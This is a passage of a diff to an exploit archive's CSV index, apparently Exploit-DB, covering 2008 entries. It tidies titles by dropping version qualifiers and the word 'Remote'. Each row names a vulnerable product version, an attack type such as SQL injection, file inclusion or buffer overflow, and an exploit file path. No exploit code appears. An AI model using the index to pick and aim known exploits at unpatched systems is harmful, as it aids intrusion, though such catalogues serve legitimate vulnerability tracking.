Injection",2008-04-10,S@BUN,php,webapps,0 +5426,platforms/php/webapps/5426.txt,"RX Maxsoft (popup_img.php fotoID) SQL Injection",2008-04-10,S@BUN,php,webapps,0 5427,platforms/windows/dos/5427.pl,"Borland InterBase 2007 - ibserver.exe Buffer Overflow PoC",2008-04-11,"Liu Zhen Hua",windows,dos,0 5428,platforms/php/webapps/5428.txt,"PHPKB 1.5 Knowledge Base (ID) SQL Injection",2008-04-11,parad0x,php,webapps,0 5429,platforms/php/webapps/5429.txt,"newsoffice 1.1 - Remote File Inclusion",2008-04-11,RoMaNcYxHaCkEr,php,webapps,0 -5430,platforms/multiple/remote/5430.txt,"HP OpenView Network Node Manager <= 7.53 - Multiple Vulnerabilities",2008-04-11,"Luigi Auriemma",multiple,remote,0 -5431,platforms/php/webapps/5431.txt,"Joomla Component joomlaXplorer <= 1.6.2 - Remote Vulnerabilities",2008-04-11,Houssamix,php,webapps,0 +5430,platforms/multiple/remote/5430.txt,"HP OpenView Network Node Manager 7.53 - Multiple Vulnerabilities",2008-04-11,"Luigi Auriemma",multiple,remote,0 +5431,platforms/php/webapps/5431.txt,"Joomla Component joomlaXplorer 1.6.2 - Remote Vulnerabilities",2008-04-11,Houssamix,php,webapps,0 5432,platforms/php/webapps/5432.txt,"phpAddressBook 2.11 - (view.php id) SQL Injection",2008-04-11,Cr@zy_King,php,webapps,0 -5433,platforms/php/webapps/5433.txt,"CcMail <= 1.0.1 Insecure Cookie Handling",2008-04-12,t0pP8uZz,php,webapps,0 -5434,platforms/php/webapps/5434.pl,"1024 CMS <= 1.4.2 - Local File Inclusion / Blind SQL Injection Exploit",2008-04-13,girex,php,webapps,0 -5435,platforms/php/webapps/5435.txt,"Joomla Component com_extplorer <= 2.0.0 RC2 - Local Directory Traversal",2008-04-13,Houssamix,php,webapps,0 -5436,platforms/php/webapps/5436.txt,"Pollbooth <= 2.0 - (pollID) Remote SQL Injection",2008-04-13,S@BUN,php,webapps,0 +5433,platforms/php/webapps/5433.txt,"CcMail 1.0.1 Insecure Cookie Handling",2008-04-12,t0pP8uZz,php,webapps,0 +5434,platforms/php/webapps/5434.pl,"1024 CMS 1.4.2 - Local File Inclusion / Blind SQL Injection Exploit",2008-04-13,girex,php,webapps,0 +5435,platforms/php/webapps/5435.txt,"Joomla Component com_extplorer 2.0.0 RC2 - Local Directory Traversal",2008-04-13,Houssamix,php,webapps,0 +5436,platforms/php/webapps/5436.txt,"Pollbooth 2.0 - (pollID) SQL Injection",2008-04-13,S@BUN,php,webapps,0 5437,platforms/php/webapps/5437.txt,"cpcommerce 1.1.0 - (XSS/LFI) Multiple Vulnerabilities",2008-04-13,BugReport.IR,php,webapps,0 5438,platforms/windows/dos/5438.py,"XM Easy Personal FTP Server 5.4.0 - (XCWD) Denial of Service Exploit",2008-04-13,j0rgan,windows,dos,0 5439,platforms/php/webapps/5439.txt,"PostCard 1.0 - Remote Insecure Cookie Handling",2008-04-13,t0pP8uZz,php,webapps,0 5440,platforms/php/webapps/5440.php,"Mumbo Jumbo Media OP4 - Remote Blind SQL Injection Exploit",2008-04-13,Lidloses_Auge,php,webapps,0 -5441,platforms/php/webapps/5441.txt,"SmallBiz 4 Seasons CMS Remote SQL Injection",2008-04-14,cO2,php,webapps,0 +5441,platforms/php/webapps/5441.txt,"SmallBiz 4 Seasons CMS SQL Injection",2008-04-14,cO2,php,webapps,0 5442,platforms/windows/local/5442.cpp,"Microsoft Windows GDI - Image Parsing Stack Overflow Exploit (MS08-021)",2008-04-14,Lamhtz,windows,local,0 -5443,platforms/php/webapps/5443.txt,"SmallBiz eShop (content_id) Remote SQL Injection",2008-04-14,Stack,php,webapps,0 +5443,platforms/php/webapps/5443.txt,"SmallBiz eShop (content_id) SQL Injection",2008-04-14,Stack,php,webapps,0 5444,platforms/php/webapps/5444.txt,"BosClassifieds 3.0 - (index.php cat) SQL Injection",2008-04-14,"SoSo H H",php,webapps,0 5445,platforms/windows/remote/5445.cpp,"HP OpenView NNM 7.5.1 - ovalarmsrv.exe Remote Overflow Exploit",2008-04-14,Heretic2,windows,remote,2954 -5446,platforms/php/webapps/5446.txt,"BosNews 4.0 - (article) Remote SQL Injection",2008-04-14,Crackers_Child,php,webapps,0 -5447,platforms/php/webapps/5447.txt,"Koobi CMS 4.2.4/4.2.5/4.3.0 - Multiple Remote SQL Injection Vulnerabilities",2008-04-14,JosS,php,webapps,0 -5448,platforms/php/webapps/5448.txt,"Koobi Pro 6.25 poll Remote SQL Injection",2008-04-14,S@BUN,php,webapps,0 +5446,platforms/php/webapps/5446.txt,"BosNews 4.0 - (article) SQL Injection",2008-04-14,Crackers_Child,php,webapps,0 +5447,platforms/php/webapps/5447.txt,"Koobi CMS 4.2.4/4.2.5/4.3.0 - Multiple SQL Injection Vulnerabilities",2008-04-14,JosS,php,webapps,0 +5448,platforms/php/webapps/5448.txt,"Koobi Pro 6.25 poll SQL Injection",2008-04-14,S@BUN,php,webapps,0 5449,platforms/php/webapps/5449.php,"KwsPHP (Upload) Remote Code Execution Exploit",2008-04-14,Ajax,php,webapps,0 5450,platforms/php/webapps/5450.txt,"Classifieds Caffe (index.php cat_id) SQL Injection",2008-04-15,JosS,php,webapps,0 5451,platforms/windows/remote/5451.py,"BigAnt Server 2.2 - PreAuth Remote SEH Overflow Exploit (0Day)",2008-04-15,ryujin,windows,remote,6080 -5452,platforms/php/webapps/5452.txt,"lightneasy sqlite / no database <= 1.2.2 - Multiple Vulnerabilities",2008-04-15,girex,php,webapps,0 -5453,platforms/windows/dos/5453.pl,"DivX Player <= 6.7.0 SRT File Buffer Overflow PoC",2008-04-15,securfrog,windows,dos,0 -5454,platforms/php/webapps/5454.txt,"Lasernet CMS 1.5 - Remote SQL Injection (2)",2008-04-15,cO2,php,webapps,0 +5452,platforms/php/webapps/5452.txt,"lightneasy sqlite / no database 1.2.2 - Multiple Vulnerabilities",2008-04-15,girex,php,webapps,0 +5453,platforms/windows/dos/5453.pl,"DivX Player 6.7.0 SRT File Buffer Overflow PoC",2008-04-15,securfrog,windows,dos,0 +5454,platforms/php/webapps/5454.txt,"Lasernet CMS 1.5 - SQL Injection (2)",2008-04-15,cO2,php,webapps,0 5455,platforms/windows/dos/5455.py,"BS.Player 2.27 Build 959 SRT File Buffer Overflow PoC",2008-04-16,j0rgan,windows,dos,0 -5456,platforms/asp/webapps/5456.txt,"carbon communities <= 2.4 - Multiple Vulnerabilities",2008-04-16,BugReport.IR,asp,webapps,0 -5457,platforms/php/webapps/5457.txt,"XplodPHP AutoTutorials <= 2.1 - (id) SQL Injection",2008-04-16,cO2,php,webapps,0 -5458,platforms/linux/dos/5458.txt,"xine-lib <= 1.1.12 NSF demuxer Stack Overflow PoC",2008-04-16,"Guido Landi",linux,dos,0 +5456,platforms/asp/webapps/5456.txt,"carbon communities 2.4 - Multiple Vulnerabilities",2008-04-16,BugReport.IR,asp,webapps,0 +5457,platforms/php/webapps/5457.txt,"XplodPHP AutoTutorials 2.1 - (id) SQL Injection",2008-04-16,cO2,php,webapps,0 +5458,platforms/linux/dos/5458.txt,"xine-lib 1.1.12 NSF demuxer Stack Overflow PoC",2008-04-16,"Guido Landi",linux,dos,0 5459,platforms/php/webapps/5459.txt,"e107 module 123 flash chat 6.8.0 - Remote File Inclusion",2008-04-17,by_casper41,php,webapps,0 5460,platforms/windows/dos/5460.html,"Microsoft Works 7 WkImgSrv.dll ActiveX Denial of Service PoC",2008-04-17,"Shennan Wang",windows,dos,0 5461,platforms/windows/remote/5461.rb,"Intel Centrino ipw2200BG Wireless Driver Remote BoF Exploit (Metasploit)",2008-04-17,oveRet,windows,remote,0 5462,platforms/windows/local/5462.py,"DivX Player 6.6.0 - .SRT File SEH Buffer Overflow Exploit",2008-04-18,muts,windows,local,0 5463,platforms/php/webapps/5463.txt,"Grape Statistics 0.2a (location) Remote File Inclusion",2008-04-18,MajnOoNxHaCkEr,php,webapps,0 5464,platforms/php/webapps/5464.txt,"5th Avenue Shopping Cart (category_ID) SQL Injection",2008-04-18,"Aria-Security Team",php,webapps,0 -5465,platforms/php/webapps/5465.txt,"2532/Gigs <= 1.2.2 - Arbitrary Database Backup/Download",2008-04-18,t0pP8uZz,php,webapps,0 +5465,platforms/php/webapps/5465.txt,"2532/Gigs 1.2.2 - Arbitrary Database Backup/Download",2008-04-18,t0pP8uZz,php,webapps,0 5466,platforms/php/webapps/5466.pl,"OpenInvoice 0.9 - Arbitrary Change User Password Exploit",2008-04-18,t0pP8uZz,php,webapps,0 -5467,platforms/php/webapps/5467.txt,"PhShoutBox <= 1.5 - (final) Insecure Cookie Handling",2008-04-18,t0pP8uZz,php,webapps,0 +5467,platforms/php/webapps/5467.txt,"PhShoutBox 1.5 - (final) Insecure Cookie Handling",2008-04-18,t0pP8uZz,php,webapps,0 5468,platforms/php/webapps/5468.txt,"Simple Customer 1.2 - (contact.php id) SQL Injection",2008-04-18,t0pP8uZz,php,webapps,0 -5469,platforms/php/webapps/5469.txt,"AllMyGuests <= 0.4.1 - (AMG_id) Remote SQL Injection",2008-04-19,Player,php,webapps,0 -5470,platforms/php/webapps/5470.py,"PHP-Fusion <= 6.01.14 - Remote Blind SQL Injection Exploit",2008-04-19,The:Paradox,php,webapps,0 +5469,platforms/php/webapps/5469.txt,"AllMyGuests 0.4.1 - (AMG_id) SQL Injection",2008-04-19,Player,php,webapps,0 +5470,platforms/php/webapps/5470.py,"PHP-Fusion 6.01.14 - Remote Blind SQL Injection Exploit",2008-04-19,The:Paradox,php,webapps,0 5471,platforms/php/webapps/5471.txt,"Apartment Search Script (listtest.php r) SQL Injection",2008-04-19,Crackers_Child,php,webapps,0 5472,platforms/windows/dos/5472.py,"SubEdit Player build 4066 subtitle Buffer Overflow PoC",2008-04-19,grzdyl,windows,dos,0 5473,platforms/php/webapps/5473.pl,"XOOPS Module Recipe (detail.php id) SQL Injection",2008-04-19,S@BUN,php,webapps,0 @@ -5112,36 +5112,36 @@ id,file,description,date,author,platform,type,port 5477,platforms/php/webapps/5477.txt,"Kubelance 1.6.4 - (ipn.php i) Local File Inclusion",2008-04-20,Crackers_Child,php,webapps,0 5478,platforms/php/webapps/5478.txt,"acidcat CMS 3.4.1 - Multiple Vulnerabilities",2008-04-20,BugReport.IR,php,webapps,0 5479,platforms/windows/local/5479.txt,"Adobe Album Starter 3.2 Unchecked Local Buffer Overflow Exploit",2008-04-21,c0ntex,windows,local,0 -5480,platforms/php/webapps/5480.txt,"BlogWorx 1.0 - (view.asp id) Remote SQL Injection",2008-04-21,U238,php,webapps,0 -5481,platforms/php/webapps/5481.txt,"Crazy Goomba 1.2.1 - (id) Remote SQL Injection",2008-04-21,ZoRLu,php,webapps,0 -5482,platforms/asp/webapps/5482.py,"RedDot CMS 7.5 - (LngId) Remote SQL Injection Exploit",2008-04-21,"IRM Plc.",asp,webapps,0 -5483,platforms/php/webapps/5483.txt,"TR News 2.1 - (nb) Remote SQL Injection",2008-04-21,His0k4,php,webapps,0 +5480,platforms/php/webapps/5480.txt,"BlogWorx 1.0 - (view.asp id) SQL Injection",2008-04-21,U238,php,webapps,0 +5481,platforms/php/webapps/5481.txt,"Crazy Goomba 1.2.1 - (id) SQL Injection",2008-04-21,ZoRLu,php,webapps,0 +5482,platforms/asp/webapps/5482.py,"RedDot CMS 7.5 - (LngId) SQL Injection Exploit",2008-04-21,"IRM Plc.",asp,webapps,0 +5483,platforms/php/webapps/5483.txt,"TR News 2.1 - (nb) SQL Injection",2008-04-21,His0k4,php,webapps,0 5484,platforms/php/webapps/5484.txt,"Joomla Component FlippingBook 1.0.4 - SQL Injection",2008-04-22,cO2,php,webapps,0 -5485,platforms/php/webapps/5485.pl,"Web Calendar <= 4.1 - Blind SQL Injection Exploit",2008-04-22,t0pP8uZz,php,webapps,0 -5486,platforms/php/webapps/5486.txt,"WordPress Plugin Spreadsheet <= 0.6 - SQL Injection",2008-04-22,1ten0.0net1,php,webapps,0 +5485,platforms/php/webapps/5485.pl,"Web Calendar 4.1 - Blind SQL Injection Exploit",2008-04-22,t0pP8uZz,php,webapps,0 +5486,platforms/php/webapps/5486.txt,"WordPress Plugin Spreadsheet 0.6 - SQL Injection",2008-04-22,1ten0.0net1,php,webapps,0 5487,platforms/php/webapps/5487.txt,"E RESERV 2.1 - (index.php ID_loc) SQL Injection",2008-04-23,JIKO,php,webapps,0 5488,platforms/php/webapps/5488.txt,"Joomla Component Filiale 1.0.4 - (idFiliale) SQL Injection",2008-04-23,str0xo,php,webapps,0 5489,platforms/windows/remote/5489.html,"Zune Software - ActiveX Arbitrary File Overwrite Exploit",2008-04-23,"ilion security",windows,remote,0 5490,platforms/php/webapps/5490.pl,"YouTube Clone Script (spages.php) Remote Code Execution Exploit",2008-04-23,Inphex,php,webapps,0 -5491,platforms/php/webapps/5491.txt,"Joomla Community Builder <= 1.0.1 - Blind SQL Injection",2008-04-23,$hur!k'n,php,webapps,0 +5491,platforms/php/webapps/5491.txt,"Joomla Community Builder 1.0.1 - Blind SQL Injection",2008-04-23,$hur!k'n,php,webapps,0 5492,platforms/windows/local/5492.cpp,"DivX Player 6.7 SRT File Subtitle Parsing Buffer Overflow Exploit",2008-04-24,lhoang8500,windows,local,0 5493,platforms/php/webapps/5493.txt,"Joomla Component JPad 1.0 - SQL Injection (postauth)",2008-04-24,His0k4,php,webapps,0 5494,platforms/php/webapps/5494.txt,"minibb 2.2 - (css/SQL/fpd) Multiple Vulnerabilities",2008-04-25,girex,php,webapps,0 5495,platforms/php/webapps/5495.txt,"PostNuke Module PostSchedule (eid) SQL Injection",2008-04-25,Kacper,php,webapps,0 5496,platforms/windows/remote/5496.html,"WatchFire Appscan 7.0 - ActiveX Multiple Insecure Methods Exploit",2008-04-25,callAX,windows,remote,0 -5497,platforms/php/webapps/5497.txt,"Joomla Component Joomla-Visites 1.1 RC2 - RFI",2008-04-25,NoGe,php,webapps,0 +5497,platforms/php/webapps/5497.txt,"Joomla Component Joomla-Visites 1.1 RC2 - Remote File Inclusion",2008-04-25,NoGe,php,webapps,0 5498,platforms/windows/local/5498.py,"Kantaris 0.3.4 SSA Subtitle Local Buffer Overflow Exploit",2008-04-25,j0rgan,windows,local,0 5499,platforms/php/webapps/5499.txt,"siteman 2.x - (exec/LFI/XSS) Multiple Vulnerabilities",2008-04-26,"Khashayar Fereidani",php,webapps,0 -5500,platforms/php/webapps/5500.txt,"PostNuke Module pnFlashGames <= 2.5 - SQL Injection Vulnerabilities",2008-04-26,Kacper,php,webapps,0 -5501,platforms/php/webapps/5501.txt,"Content Management System for Phprojekt 0.6.1 - RFI Vulnerabiltiies",2008-04-26,RoMaNcYxHaCkEr,php,webapps,0 -5502,platforms/php/webapps/5502.pl,"Clever Copy 3.0 - (postview.php) Remote SQL Injection Exploit",2008-04-26,U238,php,webapps,0 -5503,platforms/asp/webapps/5503.txt,"Angelo-Emlak 1.0 - Multiple Remote SQL Injection Vulnerabilities",2008-04-26,U238,asp,webapps,0 -5504,platforms/php/webapps/5504.txt,"PHP Forge <= 3 beta 2 - (id) Remote SQL Injection",2008-04-26,JIKO,php,webapps,0 +5500,platforms/php/webapps/5500.txt,"PostNuke Module pnFlashGames 2.5 - SQL Injection Vulnerabilities",2008-04-26,Kacper,php,webapps,0 +5501,platforms/php/webapps/5501.txt,"Content Management System for Phprojekt 0.6.1 - Remote File Inclusion Vulnerabiltiies",2008-04-26,RoMaNcYxHaCkEr,php,webapps,0 +5502,platforms/php/webapps/5502.pl,"Clever Copy 3.0 - (postview.php) SQL Injection Exploit",2008-04-26,U238,php,webapps,0 +5503,platforms/asp/webapps/5503.txt,"Angelo-Emlak 1.0 - Multiple SQL Injection Vulnerabilities",2008-04-26,U238,asp,webapps,0 +5504,platforms/php/webapps/5504.txt,"PHP Forge 3 beta 2 - (id) SQL Injection",2008-04-26,JIKO,php,webapps,0 5505,platforms/php/webapps/5505.txt,"RunCMS Module MyArticles 0.6 Beta-1 SQL Injection",2008-04-26,Cr@zy_King,php,webapps,0 5506,platforms/php/webapps/5506.txt,"PHPizabi 0.848b C1 HFP3 - Database Information Disclosure",2008-04-26,YOUCODE,php,webapps,0 5507,platforms/asp/webapps/5507.txt,"megabbs forum 2.2 - (SQL/XSS) Multiple Vulnerabilities",2008-04-27,BugReport.IR,asp,webapps,0 5508,platforms/php/webapps/5508.txt,"Jokes Site Script (jokes.php?catagorie) SQL Injection",2008-04-27,ProgenTR,php,webapps,0 -5509,platforms/php/webapps/5509.txt,"FluentCMS (view.php sid) Remote SQL Injection",2008-04-27,cO2,php,webapps,0 +5509,platforms/php/webapps/5509.txt,"FluentCMS (view.php sid) SQL Injection",2008-04-27,cO2,php,webapps,0 5510,platforms/php/webapps/5510.txt,"Content Management System for Phprojekt 0.6.1 - File Disclosure",2008-04-27,Houssamix,php,webapps,0 5511,platforms/windows/remote/5511.html,"HP Software Update (Hpufunction.dll 4.0.0.1) Insecure Method PoC",2008-04-27,callAX,windows,remote,0 5512,platforms/php/webapps/5512.pl,"Joomla Component com_alphacontent Blind SQL Injection Exploit",2008-04-27,cO2,php,webapps,0 @@ -5154,7 +5154,7 @@ id,file,description,date,author,platform,type,port 5519,platforms/windows/remote/5519.c,"VLC 0.8.6d - httpd_FileCallBack Remote Format String Exploit",2008-04-28,EpiBite,windows,remote,0 5520,platforms/php/webapps/5520.txt,"Joovili 3.1 - (browse.videos.php category) SQL Injection",2008-04-28,HaCkeR_EgY,php,webapps,0 5521,platforms/php/webapps/5521.txt,"SugarCRM Community Edition 4.5.1/5.0.0 File Disclosure",2008-04-29,"Roberto Suggi Liverani",php,webapps,0 -5522,platforms/php/webapps/5522.txt,"LokiCMS <= 0.3.3 - Arbitrary File Delete",2008-04-29,cOndemned,php,webapps,0 +5522,platforms/php/webapps/5522.txt,"LokiCMS 0.3.3 - Arbitrary File Delete",2008-04-29,cOndemned,php,webapps,0 5523,platforms/php/webapps/5523.txt,"Project Based Calendaring System (PBCS) 0.7.1 - Multiple Vulnerabilities",2008-04-30,GoLd_M,php,webapps,0 5524,platforms/php/webapps/5524.txt,"OxYProject 0.85 - (edithistory.php) Remote Code Execution",2008-04-30,GoLd_M,php,webapps,0 5525,platforms/php/webapps/5525.txt,"Harris WapChat 1 - Multiple Remote File Inclusion Vulnerabilities",2008-04-30,k1n9k0ng,php,webapps,0 @@ -5163,176 +5163,176 @@ id,file,description,date,author,platform,type,port 5528,platforms/php/webapps/5528.txt,"ActualAnalyzer Lite (free) 2.78 - Local File Inclusion",2008-05-01,"Khashayar Fereidani",php,webapps,0 5529,platforms/php/webapps/5529.txt,"vlbook 1.21 - (XSS/LFI) Multiple Vulnerabilities",2008-05-01,"Khashayar Fereidani",php,webapps,0 5530,platforms/windows/remote/5530.html,"Microsoft Works 7 WkImgSrv.dll ActiveX Remote BoF Exploit",2008-05-02,lhoang8500,windows,remote,0 -5531,platforms/php/webapps/5531.txt,"Open Auto Classifieds 1.4.3b Remote SQL Injection Vulnerabilities",2008-05-02,InjEctOr5,php,webapps,0 +5531,platforms/php/webapps/5531.txt,"Open Auto Classifieds 1.4.3b SQL Injection Vulnerabilities",2008-05-02,InjEctOr5,php,webapps,0 5532,platforms/php/webapps/5532.txt,"ItCMS 1.9 - (boxpop.php) Remote Code Execution",2008-05-02,Cod3rZ,php,webapps,0 5533,platforms/php/webapps/5533.txt,"BlogMe PHP (comments.php id) SQL Injection",2008-05-03,His0k4,php,webapps,0 5534,platforms/multiple/remote/5534.txt,"HLDS WebMod 0.48 - Multiple Remote Vulnerabilties",2008-05-03,"Luigi Auriemma",multiple,remote,0 -5535,platforms/php/webapps/5535.txt,"Smartblog (index.php tid) Remote SQL Injection",2008-05-03,His0k4,php,webapps,0 +5535,platforms/php/webapps/5535.txt,"Smartblog (index.php tid) SQL Injection",2008-05-03,His0k4,php,webapps,0 5536,platforms/windows/remote/5536.php,"HLDS WebMod 0.48 - (rconpass) Remote Heap Overflow Exploit",2008-05-03,SkOd,windows,remote,0 -5537,platforms/php/webapps/5537.txt,"phpDirectorySource 1.1 - Multiple Remote SQL Injection Vulnerabilities",2008-05-03,InjEctOr5,php,webapps,0 +5537,platforms/php/webapps/5537.txt,"phpDirectorySource 1.1 - Multiple SQL Injection Vulnerabilities",2008-05-03,InjEctOr5,php,webapps,0 5538,platforms/php/webapps/5538.txt,"cplinks 1.03 - (bypass/SQL/xxs) Multiple Vulnerabilities",2008-05-04,InjEctOr5,php,webapps,0 5539,platforms/php/webapps/5539.txt,"ScorpNews 1.0 - (example.php site) Remote File Inclusion",2008-05-04,Silver,php,webapps,0 -5540,platforms/php/webapps/5540.pl,"Scout Portal Toolkit <= 1.4.0 - (ParentId) Remote SQL Injection Exploit",2008-05-04,JosS,php,webapps,0 -5541,platforms/php/webapps/5541.txt,"PostNuke Module pnEncyclopedia <= 0.2.0 - SQL Injection",2008-05-05,K-159,php,webapps,0 -5542,platforms/php/webapps/5542.txt,"Online Rental Property Script <= 4.5 - (pid) SQL Injection",2008-05-05,K-159,php,webapps,0 +5540,platforms/php/webapps/5540.pl,"Scout Portal Toolkit 1.4.0 - (ParentId) SQL Injection Exploit",2008-05-04,JosS,php,webapps,0 +5541,platforms/php/webapps/5541.txt,"PostNuke Module pnEncyclopedia 0.2.0 - SQL Injection",2008-05-05,K-159,php,webapps,0 +5542,platforms/php/webapps/5542.txt,"Online Rental Property Script 4.5 - (pid) SQL Injection",2008-05-05,K-159,php,webapps,0 5543,platforms/php/webapps/5543.txt,"Anserv Auction XL (viewfaqs.php cat) - SQL Injection",2008-05-05,K-159,php,webapps,0 -5544,platforms/php/webapps/5544.txt,"Kmita Tellfriend <= 2.0 - (file) Remote File Inclusion",2008-05-05,K-159,php,webapps,0 -5545,platforms/php/webapps/5545.txt,"Kmita Mail <= 3.0 - (file) Remote File Inclusion",2008-05-05,K-159,php,webapps,0 -5546,platforms/php/webapps/5546.txt,"BackLinkSpider (cat_id) - Remote SQL Injection",2008-05-05,K-159,php,webapps,0 +5544,platforms/php/webapps/5544.txt,"Kmita Tellfriend 2.0 - (file) Remote File Inclusion",2008-05-05,K-159,php,webapps,0 +5545,platforms/php/webapps/5545.txt,"Kmita Mail 3.0 - (file) Remote File Inclusion",2008-05-05,K-159,php,webapps,0 +5546,platforms/php/webapps/5546.txt,"BackLinkSpider (cat_id) - SQL Injection",2008-05-05,K-159,php,webapps,0 5547,platforms/windows/dos/5547.txt,"Novell eDirectory < 8.7.3 SP 10 / 8.8.2 - HTTP headers DoS",2008-05-05,Nicob,windows,dos,0 -5548,platforms/php/webapps/5548.txt,"Miniweb 2.0 - (historymonth) Remote SQL Injection",2008-05-05,HaCkeR_EgY,php,webapps,0 +5548,platforms/php/webapps/5548.txt,"Miniweb 2.0 - (historymonth) SQL Injection",2008-05-05,HaCkeR_EgY,php,webapps,0 5549,platforms/php/webapps/5549.txt,"Power Editor 2.0 - Remote File Disclosure / Edit",2008-05-05,"Virangar Security",php,webapps,0 -5550,platforms/php/webapps/5550.php,"deluxebb <= 1.2 - Multiple Vulnerabilities",2008-05-05,EgiX,php,webapps,0 +5550,platforms/php/webapps/5550.php,"deluxebb 1.2 - Multiple Vulnerabilities",2008-05-05,EgiX,php,webapps,0 5551,platforms/php/webapps/5551.txt,"Pre Shopping Mall 1.1 - (search.php search) SQL Injection",2008-05-06,t0pP8uZz,php,webapps,0 -5552,platforms/php/webapps/5552.txt,"PHPEasyData 1.5.4 - (cat_id) Remote SQL Injection",2008-05-06,InjEctOr5,php,webapps,0 -5553,platforms/asp/webapps/5553.txt,"fipsCMS (print.asp lg) Remote SQL Injection",2008-05-07,InjEctOr5,asp,webapps,0 -5554,platforms/php/webapps/5554.php,"Galleristic 1.0 - (index.php cat) Remote SQL Injection Exploit",2008-05-07,cOndemned,php,webapps,0 +5552,platforms/php/webapps/5552.txt,"PHPEasyData 1.5.4 - (cat_id) SQL Injection",2008-05-06,InjEctOr5,php,webapps,0 +5553,platforms/asp/webapps/5553.txt,"fipsCMS (print.asp lg) SQL Injection",2008-05-07,InjEctOr5,asp,webapps,0 +5554,platforms/php/webapps/5554.php,"Galleristic 1.0 - (index.php cat) SQL Injection Exploit",2008-05-07,cOndemned,php,webapps,0 5555,platforms/php/webapps/5555.txt,"gameCMS Lite 1.0 - (index.php systemId) SQL Injection",2008-05-07,InjEctOr5,php,webapps,0 5556,platforms/asp/webapps/5556.txt,"PostcardMentor (step1.asp cat_fldAuto) SQL Injection",2008-05-07,InjEctOr5,asp,webapps,0 5557,platforms/php/webapps/5557.pl,"OneCMS 2.5 - Remote Blind SQL Injection Exploit",2008-05-07,Cod3rZ,php,webapps,0 5558,platforms/php/webapps/5558.txt,"CMS Faethon 2.2 Ultimate - (RFI/XSS) Multiple Remote Vulnerabilies",2008-05-07,RoMaNcYxHaCkEr,php,webapps,0 -5559,platforms/php/webapps/5559.txt,"ezContents CMS 2.0.0 - Multiple Remote SQL Injection Vulnerabilities",2008-05-07,"Virangar Security",php,webapps,0 -5560,platforms/php/webapps/5560.txt,"Musicbox <= 2.3.7 - (artistId) Remote SQL Injection",2008-05-07,HaCkeR_EgY,php,webapps,0 +5559,platforms/php/webapps/5559.txt,"ezContents CMS 2.0.0 - Multiple SQL Injection Vulnerabilities",2008-05-07,"Virangar Security",php,webapps,0 +5560,platforms/php/webapps/5560.txt,"Musicbox 2.3.7 - (artistId) SQL Injection",2008-05-07,HaCkeR_EgY,php,webapps,0 5561,platforms/linux/dos/5561.pl,"rdesktop 1.5.0 iso_recv_msg() Integer Underflow PoC",2008-05-08,"Guido Landi",linux,dos,0 -5562,platforms/php/webapps/5562.py,"RunCMS <= 1.6.1 - (msg_image) SQL Injection Exploit",2008-05-08,The:Paradox,php,webapps,0 +5562,platforms/php/webapps/5562.py,"RunCMS 1.6.1 - (msg_image) SQL Injection Exploit",2008-05-08,The:Paradox,php,webapps,0 5563,platforms/windows/remote/5563.pl,"TFTP Server for Windows 1.4 - ST Remote BSS Overflow Exploit",2008-05-08,tixxDZ,windows,remote,69 -5564,platforms/asp/webapps/5564.txt,"Shader TV (Beta) - Multiple Remote SQL Injection Vulnerabilities",2008-05-08,U238,asp,webapps,0 -5565,platforms/php/webapps/5565.pl,"vShare Youtube Clone 2.6 - (tid) Remote SQL Injection",2008-05-08,Saime,php,webapps,0 +5564,platforms/asp/webapps/5564.txt,"Shader TV (Beta) - Multiple SQL Injection Vulnerabilities",2008-05-08,U238,asp,webapps,0 +5565,platforms/php/webapps/5565.pl,"vShare Youtube Clone 2.6 - (tid) SQL Injection",2008-05-08,Saime,php,webapps,0 5566,platforms/php/webapps/5566.txt,"SazCart 1.5.1 - Multiple Remote File Inclusion Vulnerabilities",2008-05-08,RoMaNcYxHaCkEr,php,webapps,0 5567,platforms/php/webapps/5567.txt,"Cyberfolio 7.12 - (rep) Remote File Inclusion",2008-05-08,RoMaNcYxHaCkEr,php,webapps,0 5568,platforms/php/webapps/5568.txt,"miniBloggie 1.0 - (del.php) Arbitrary Delete Post",2008-05-08,Cod3rZ,php,webapps,0 5575,platforms/php/webapps/5575.txt,"Admidio 1.4.8 - (getfile.php) Remote File Disclosure",2008-05-09,n3v3rh00d,php,webapps,0 -5576,platforms/php/webapps/5576.pl,"SazCart <= 1.5.1 - (prodid) Remote SQL Injection Exploit",2008-05-09,JosS,php,webapps,0 -5577,platforms/php/webapps/5577.txt,"HispaH Model Search (cat.php cat) Remote SQL Injection",2008-05-09,InjEctOr5,php,webapps,0 -5578,platforms/php/webapps/5578.txt,"Phoenix View CMS <= Pre Alpha2 - (SQL/LFI/XSS) Multiple Vulnerabilities",2008-05-09,tw8,php,webapps,0 +5576,platforms/php/webapps/5576.pl,"SazCart 1.5.1 - (prodid) SQL Injection Exploit",2008-05-09,JosS,php,webapps,0 +5577,platforms/php/webapps/5577.txt,"HispaH Model Search (cat.php cat) SQL Injection",2008-05-09,InjEctOr5,php,webapps,0 +5578,platforms/php/webapps/5578.txt,"Phoenix View CMS Pre Alpha2 - (SQL/LFI/XSS) Multiple Vulnerabilities",2008-05-09,tw8,php,webapps,0 5579,platforms/php/webapps/5579.htm,"txtCMS 0.3 - (index.php) Local File Inclusion Exploit",2008-05-09,cOndemned,php,webapps,0 -5580,platforms/php/webapps/5580.txt,"Ktools PhotoStore <= 3.5.1 - (gallery.php gid) SQL Injection",2008-05-09,Mr.SQL,php,webapps,0 +5580,platforms/php/webapps/5580.txt,"Ktools PhotoStore 3.5.1 - (gallery.php gid) SQL Injection",2008-05-09,Mr.SQL,php,webapps,0 5581,platforms/php/webapps/5581.txt,"Advanced Links Management (ALM) 1.52 SQL Injection",2008-05-10,His0k4,php,webapps,0 -5582,platforms/php/webapps/5582.txt,"Ktools PhotoStore <= 3.5.2 - Multiple SQL Injection Vulnerabilities",2008-05-10,DNX,php,webapps,0 +5582,platforms/php/webapps/5582.txt,"Ktools PhotoStore 3.5.2 - Multiple SQL Injection Vulnerabilities",2008-05-10,DNX,php,webapps,0 5583,platforms/php/webapps/5583.php,"Joomla Component com_datsogallery 1.6 - Blind SQL Injection Exploit",2008-05-10,+toxa+,php,webapps,0 5584,platforms/windows/local/5584.c,"Open Office.org 2.31 swriter Local Code Execution Exploit",2008-05-10,Marsu,windows,local,0 5585,platforms/linux/dos/5585.pl,"rdesktop 1.5.0 process_redirect_pdu() BSS Overflow PoC",2008-05-11,"Guido Landi",linux,dos,0 5586,platforms/php/webapps/5586.txt,"PhpBlock a8.5 - Multiple Remote File Inclusion Vulnerabilities",2008-05-11,CraCkEr,php,webapps,0 -5587,platforms/php/webapps/5587.pl,"Joomla Component xsstream-dm 0.01b Remote SQL Injection Exploit",2008-05-11,Houssamix,php,webapps,0 -5588,platforms/php/webapps/5588.php,"QuickUpCMS - 